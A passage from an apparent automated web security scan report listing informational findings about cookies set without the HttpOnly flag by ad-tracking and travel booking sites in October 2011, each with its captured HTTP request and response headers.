Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:56 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_218=4056--5675633421699857517=; domain=pubmatic.com; expires=Wed, 02-Oct-2013 01:52:56 GMT; path=/
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

14.150. http://images.hotelplanner.com/hotelimages/s/028000/028920A-thumb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.hotelplanner.com
Path:   /hotelimages/s/028000/028920A-thumb.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotelimages/s/028000/028920A-thumb.jpg HTTP/1.1
Host: images.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:20 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: TLTSID=F123A950ED5310ED160FDD8181683406; Path=/; Domain=.hotelplanner.com
Set-Cookie: TLTUID=F123A950ED5310ED160FDD8181683406; Path=/; Domain=.hotelplanner.com; Expires=Mon, 03-10-2021 00:09:20 GMT
HostName: TWEB10
Last-Modified: Fri, 23 Sep 2011 05:06:00 GMT
ETag: "857-c3e25e00"
Accept-Ranges: bytes
Content-Length: 2135
Content-Type: image/jpeg

......JFIF.....H.H.....C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......F.F.."..............................
...[SNIP]...
14.151. http://imgwww.priceline.com/dcscx5l599uewfk6c3m90kij8_6z6b/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imgwww.priceline.com
Path:   /dcscx5l599uewfk6c3m90kij8_6z6b/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscx5l599uewfk6c3m90kij8_6z6b/dcs.gif?&dcsdat=1317600550243&dcssip=www.priceline.com&dcsuri=/qp_landing.apn&dcsqry=%3FProductID=5R%26refid=PLIGOUGO%26refclickid=HOTELSEARCH%26City=Boston,United%20States%26Rooms=1%26CheckInDate=10/04/11%26CheckOutDate=10/07/11&dcsref=http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf%3Flob=HOTEL%26advertiserName=priceline%26grp=9706%26placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder%26url=http%3A%2F%2Fwww.priceline.com%2FQP.asp%3FProductID%3D5R%26refid%3DPLIGOUGO%26refclickid%3DHOTELSEARCH%26City%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26Rooms%3D%24%7Brooms%7D%26CheckInDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26CheckOutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26pid=c3919e40-e5b8-49f8-b876-4fed1f31968f%26sid=bfa7dd53-c988-458c-86df-52443affccb8%26uid=20d9c1fc-61a4-45f0-9524-380e68994c01%26widget=H_PopUnder%26pti=default%26src=none%26ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75%26ctx=92aa9504-b6eb-4091-8b93-6582f63d9555%26ccn=1%26cgn=154%26pos=1%26aii=d1125990-8f30-4f2a-83dc-0b115fb728a1%26%24cc=US%26%24rc=US%26%24adults=1%26%24destination=Boston%2C%20MA%20Massachusetts%26%24glsId=440663%26%24city=Boston%26%24countryn=United%20States%26%24countryc=US%26%24staten=Massachusetts%26%24statec=MA%26%24lob=HOTEL%26%24rooms=1%26%24context=92aa9504-b6eb-4091-8b93-6582f63d9555%26%24widget=H_PopUnder%26%24l=9%26%24departureDate=2011-10-04%26%24returnDate=2011-10-07%26%24aucnt=0%26%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f%26%24sid=bfa7dd53-c988-458c-86df-52443affccb8%26adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a%26&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.js=Yes&WT.jv=1.5&WT.bs=700x700&WT.fi=Yes&WT.fv=10.3&WT.sp=@@&WT.co_f=2681d53fc9a0a3b6dd31317600550352&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=2681d53fc9a0a3b6dd31317600550352.1317600550352&WT.sv=A&WT.cg_n=16&WT.z_pt_cd=PCLN&WT.z_plf_cd=PCLN&WT.z_p_pt_cd=PCLN&WT.ti=/qp_landing&WT.mc_id=PLIGOUGO&WT.z_ref=PLIGOUGO&WT.mc_ev=HOTELSEARCH&WT.z_rc=HOTELSEARCH&WT.z_vid=v2011100300090989417126&DCSext.plf_cd=PCLN HTTP/1.1
Host: imgwww.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Mon, 28 Jan 2002 14:51:42 GMT
Accept-Ranges: bytes
ETag: "013394cba8c11:60d"
Server: Microsoft-IIS/6.0
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMjkyODYxNDcyMC4zMDE3OTY4MAAAAAAAAAABAAAAAgAAAFb9iE4q/YhOAQAAAAEAAABW/YhOKv2ITgEAAAACAAAAITUwLjIzLjEyMy4xMDYtMjkyODYxNDcyMC4zMDE3OTY4MA--; path=/; expires=Thu, 30-Sep-2021 00:09:58 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Mon, 03 Oct 2011 00:09:57 GMT
Connection: close

GIF89a.............!.......,...........D..;
14.152. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317384286603_272223897_ap3103_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p270r=b$u-7#A.8Qp|i-1643195#2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/
Set-Cookie: imp=a$le#1317600624289_282559054_ap3100_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 352
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

<html><head></head><body>
<img src="http://bp.specificclick.net?pixid=99013083" width="1" height="1" /><img src="http://ads.bluelithium.com/pixel?id=1027970&t=2" width="1" height="1" /><img src="http
...[SNIP]...
14.153. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=219&fmt=redir&sec=0&pid=search2&type=Hotels&u1=&u2=Boston&u3=10/09/2011&u4=10/16/2011&u5=7&u6=&u7=S250&u8=B260711&u9=&u10=&u11=Boston+Logan+Intl.+%28BOS%29&u12=&u13=1&u14=MA&u15=US&OrderID=1317602253983&OrderValue= HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317602303729_239168105_as3104_imp|194#1317602303729_239168105_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p194r=b$u-98#5.8Qp|i-tracking#..1.8Qp.1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p219r=b$u-77#A.8Qp|i-H!FaxnS5xi!8TG!8Vy!IJ3~#1.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:41:22 GMT; Path=/
Set-Cookie: imp=a$le#1317602482047_282671641_ap3100_int|194#1317602303729_239168105_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:41:22 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 00:41:21 GMT
Connection: close

GIF89a.............!.......,...........D..;
14.154. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[504]&betq=9669=409042[504] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 00:09:02 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 03 Oct 2011 01:09:02 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
14.155. http://leadback.hotwire.db.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.hotwire.db.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=airsearch_cs=1&betq=12047=428151&xbetq=view=hs^NA^Boston^10-09^10-16 HTTP/1.1
Host: leadback.hotwire.db.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:41:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Wed, 02-Oct-2013 00:41:25 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
14.156. http://lm.trafficmp.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lm.trafficmp.com
Path:   /clicksense/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/pixel?id=105935&t=i HTTP/1.1
Host: lm.trafficmp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; naiopt=out

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:41:31 GMT
Expires: Mon, 03 Oct 2011 00:41:31 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh18/127.0.0.1
Set-Cookie: T_7te4=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_d3c6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 2=3_7CU_i48Lo; Domain=.trafficmp.com; Expires=Tue, 02-Oct-2012 00:41:31 GMT; Path=/
Set-Cookie: 8=00000000000; Domain=.trafficmp.com; Expires=Sat, 01-Oct-2016 00:41:31 GMT; Path=/
Accept-Ranges: bytes
Last-Modified: Fri, 23 Sep 2011 14:41:54 GMT
Content-Type: image/png
Content-Length: 123
Connection: close

.PNG
.
...IHDR.....................sRGB........    pHYs..........+......tIME.....0/D..O...IDAT..c````......^.*:....IEND.B`.
14.157. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=071&j=0&buid=55785307-A5DC-4E3A-B452-DDBD426D3A1D HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBdNIFeTpB4DyNcunZpvHtiAknq4xrBOagUqY2Fs1PrIIICh6en6ZHqSEtI7cSncSu2hmZ51F41%252Fd1z61oX7Lwbhg%253D%253D

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: EVX=deleted; expires=Sun, 03-Oct-2010 00:09:45 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 03-Oct-2010 00:09:45 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDK0qi62MrBSUrJOBLEzrQysi60MLayUDM2NzeLN440MTOINzA3jDeINlaxrawFA5Qzi; expires=Tue, 31-Jan-2012 00:09:46 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 03 Oct 2011 00:09:46 GMT
Server: HTTP server

14.158. http://m.xp1.ru4.com/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?_o=1807966&_t=17210472&_c=17210403&_b=17210472&ssv_c2=Y&ssv_b=c2&ssv_1=285445478 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/AVE/iview/285445478/direct;wi.728;hi.90/01/yAeNjx,bhirWmWzqkjb?click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d111781%26AdID%3d150102%26TargetID%3d9683%26Values%3d215%26Redirect%3d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17210403-B17210472=4|17210475|0|0|0|17210466|17226288|-1; domain=.ru4.com; path=/
Cache-control: private, no-cache, must-revalidate
Content-type: image/gif
Content-length: 43
X-Cnection: close

GIF89a.............!.......,...........D..;
14.159. http://m.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=tg&ssv_tg_1=&ssv_tg_2=&ssv_tg_3=000&ssv_tg_4=&ssv_duid=&ssv_tg_5=0&ssv_tg_6=0&ssv_tg_7=0&ssv_tg_8=k23-0,k24-0,k25-0,k26-0,k28-0,k29-0,k30-0,k31-0,k32-0,k33-0,k34-0,k35-0,k36-0 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:20 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 66281-B66290=3|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
X-Cnection: close

14.160. http://m.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=dx&ssv_duid=&ssv_dx_1=&ssv_dx_2=&ssv_dx_3= HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1; 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; 17210403-B17210472=4|17210475|0|0|0|17210466|17226288|-1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:13:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 90514-B90519=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
X-Cnection: close

14.161. http://m.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000 HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; domain=.ru4.com; path=/
Location: http://adadvisor.net/adscores/g.pixel?sid=9297587126
Content-length: 0
X-Cnection: close

14.162. http://o-va1.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

